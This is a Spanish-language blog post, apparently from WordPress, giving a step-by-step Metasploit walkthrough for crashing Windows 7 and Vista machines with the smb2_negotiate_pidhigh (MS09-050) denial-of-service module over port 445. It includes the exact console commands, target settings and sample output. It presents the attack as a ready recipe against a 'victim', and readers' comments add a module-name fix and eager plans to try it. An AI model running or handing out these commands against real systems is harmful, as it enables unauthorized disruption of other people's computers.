Inicio > Seguridad > Reventando un Windows 7 con Metasploit

Reventando un Windows 7 con Metasploit

Para reventar o colgar un sistema windows 7 Ultimate con metasploit, primero deberemos asegurarnos que tiene el puerto 445/tcp netbios-ssn abierto, si este es el caso, lo demás es coser y cantar.

En la consola de metasploit, escribiremos el comando para usar el smb_negotiate_pidhigh :

msf> use auxiliary/dos/windows/smb/smb2_negotiate_pidhigh

A continuación determinamos la IP de la victima con el comando set RHOST “victima ip” . ( en este caso utilizaremos una ip ficticia que sera 192.168.0.5 )

msf auxiliary(smb2_negotiate_pidhigh) > set RHOST 192.168.0.5

Despues le indicamos cual es el puerto que vamos a utilizar para el ataque, utilizando el comando set RPORT en este caso sera el 445

msf auxiliary(smb2_negotiate_pidhigh) > set RPORT 445

Y por ultimo lanzamos el ataque con el comando run y a esperar a que se cuelgue el sistema.

msf auxiliary(smb2_negotiate_pidhigh) > run

Aquí os dejo un vídeo donde se ejecutan todos los comandos paso a paso.

Aqui os dejo el resultado de un ataque frustrado contra un Windows Vista Home Premium Service Pack 1

msf > use auxiliary/dos/windows/smb/smb2_negotiate_pidhigh
msf auxiliary(smb2_negotiate_pidhigh) > set RHOST 192.168.1.35
RHOST => 192.168.1.35
msf auxiliary(smb2_negotiate_pidhigh) > set RPORT 445
RPORT => 445
msf auxiliary(smb2_negotiate_pidhigh) > run

[*] Sending request and waiting for a reply…
[*] Response received: “000000\236\376SMB@0000000000000000000100010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000A00010002020000\37621\321}\256\211\216D\226Ki03A3452601000000000001000000010000000100\320\252Q{\241\321\31201\276/K\361P\276\31201\200003600 LM `340606+0601050502\24022020\240160\f06\n+06010401\20270202\n”
[*] Auxiliary module execution completed
msf auxiliary(smb2_negotiate_pidhigh) >

Artículos relacionados:

La Metralleta de Metasploit

Anuncios
Categorías:Seguridad Etiquetas: , , ,
  1. skybotter
    22 abril, 2010 en 12:08

    en metasploit 3.4.0
    no es “smb2_negotiate_pidhig”
    es
    “ms09_050_smb2_negotiate_pidhig”

    salu2, voy a probarlo ahora mismo!

  2. Anonimo.
    17 septiembre, 2010 en 17:51

    Lammers….

    • me
      6 octubre, 2011 en 0:27

      Friky

    • angel
      2 diciembre, 2013 en 16:08

      -_- todo tiene un comienzo tío, te pones a decirnos lammers y en su momento lo fuiste o lo eres por que haces uso de un sistema automatizado o acaso te pones a hacerlo con todos los comandos cuando haces alguna tarea simplemente cuando inicias una cesión ne windows haces uso de tool´s -_- me das vergüenza.

  3. Anonimo2
    14 diciembre, 2010 en 8:15

    Anonimo it’s called learn, friky 🙂

  4. 10 enero, 2011 en 9:23

    use auxiliary/dos/windows/smb/smb2_negotiate_pidhigh

    oye ese modulo no me carga Failed to load module

    dime error es es ?

    dime cual es el windows 7 en que sp =? y en que idioma

    un favor pero el error de metasploit al cargar el modulo

    security_thanks@hotmail.com mandame un correo por favor gracias

  5. 10 enero, 2011 en 9:38

    o se hace desde linux tengo linux ubuntu ? el ataque ?=

  6. 9 agosto, 2011 en 20:46

    pero para qe sirve esto? solo recetea la maquinao que propocito tiene.???

  7. black
    24 noviembre, 2011 en 2:43

    lo ise y todo ok pero no se conecto a el pc de la victima cual seria el resultado??

  8. Dumas
    8 enero, 2012 en 18:53

    No le veo la gracia a dejar colgada una máquina.
    Como curiosidad está bien.

  1. 1 abril, 2010 en 14:07
  2. 7 abril, 2010 en 17:07

Responder

Introduce tus datos o haz clic en un icono para iniciar sesión:

Logo de WordPress.com

Estás comentando usando tu cuenta de WordPress.com. Cerrar sesión / Cambiar )

Imagen de Twitter

Estás comentando usando tu cuenta de Twitter. Cerrar sesión / Cambiar )

Foto de Facebook

Estás comentando usando tu cuenta de Facebook. Cerrar sesión / Cambiar )

Google+ photo

Estás comentando usando tu cuenta de Google+. Cerrar sesión / Cambiar )

Conectando a %s